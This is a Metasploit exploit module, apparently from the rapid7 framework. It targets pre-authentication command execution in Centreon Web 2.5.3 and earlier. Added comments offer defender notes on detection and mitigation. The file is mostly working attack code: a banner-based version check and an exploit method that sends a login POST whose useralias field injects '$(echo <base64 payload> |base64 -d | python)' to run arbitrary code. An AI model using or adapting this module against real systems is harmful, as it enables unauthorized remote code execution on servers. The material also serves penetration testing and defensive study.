GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/http/centreon_useralias_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
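# Metasploit module for the pre-authentication command execution in the
# Centreon Web Interface login form (versions <= 2.5.3 according to the module
# description; reference EDB 39501).
#
# Defender notes, limited to what this file shows:
# * Exposure: the flaw is reachable from the login screen, so no credentials
#   are required; any affected instance reachable by untrusted clients is at
#   risk.
# * Detection: the request is a POST to index.php whose `useralias` field
#   carries shell command-substitution syntax (`$(`...`)`) and a base64 blob
#   piped to an interpreter. A login alias containing shell metacharacters is
#   a strong signal in web-server or WAF logs.
# * Mitigation: the description bounds the affected range at 2.5.3, so later
#   releases are presumably fixed; confirm against the vendor advisory.
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient

  Rank = ExcellentRanking

  # Registers module metadata and the two user-facing options (RPORT and
  # TARGETURI).
  #
  # @param info [Hash] metadata supplied by the framework, merged into the
  #   module's own values by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Centreon Web Useralias Command Execution',
        'Description' => %q(
          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
          errors. This functionality can be abused for arbitrary code
          execution, and can be triggered via the login screen prior to
          authentication.
        ),
        'Author' =>
          [
            'h00die <[email protected]>', # module
            'Nicolas CHATELAIN <[email protected]>' # discovery
          ],
        'References' =>
          [
            [ 'EDB', '39501' ]
          ],
        'License' => MSF_LICENSE,
        'Platform' => ['python'],
        'Privileged' => false,
        'Arch' => ARCH_PYTHON,
        'Targets' =>
          [
            [ 'Automatic Target', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2016-02-26'
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
      ], self.class
    )
  end

  # Fingerprints the target by reading the version string printed on the
  # login page and comparing it with the last affected release (2.5.3).
  #
  # This is a banner check only: it never exercises the vulnerable code path.
  # Caveat for anyone using it as a scanner: CheckCode::Safe is also returned
  # when no version string is found in the page (custom theme, different
  # markup, not a Centreon login page), so Safe is not proof of a patched
  # host.
  #
  # @return [Exploit::CheckCode] Appears when the advertised version is
  #   <= 2.5.3, Unknown when the server sends no response, Safe otherwise
  # @raise via fail_with(Failure::Unreachable) when the connection fails
  def check
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'GET'
    )

    # send_request_cgi returns nil when no response arrives (e.g. a timeout);
    # the original dereferenced res.body unconditionally and raised
    # NoMethodError in that case.
    return Exploit::CheckCode::Unknown unless res

    # The regex literal must stay on the left of =~ so that Ruby assigns the
    # named capture to the local variable `version`.
    /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body

    if version && Rex::Version.new(version) <= Rex::Version.new('2.5.3')
      vprint_good("Version Detected: #{version}")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end

  # Sends a single login POST with the payload embedded in the `useralias`
  # field. The response is not inspected; success is determined by the
  # framework's payload handler, not by this method.
  #
  # Detection hint: the alias field of a legitimate login never contains
  # `$(`, pipes, or a trailing backslash, so this request stands out in
  # request-body logging.
  #
  # @raise via fail_with(Failure::Unreachable) when the connection fails
  def exploit
    vprint_status('Sending malicious login')
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'method' => 'POST',
      'vars_post' =>
        {
          'useralias' => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
          # The password value is irrelevant to the flaw, so a random one is sent.
          'password' => Rex::Text.rand_text_alpha(5)
        }
    )
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
  end
end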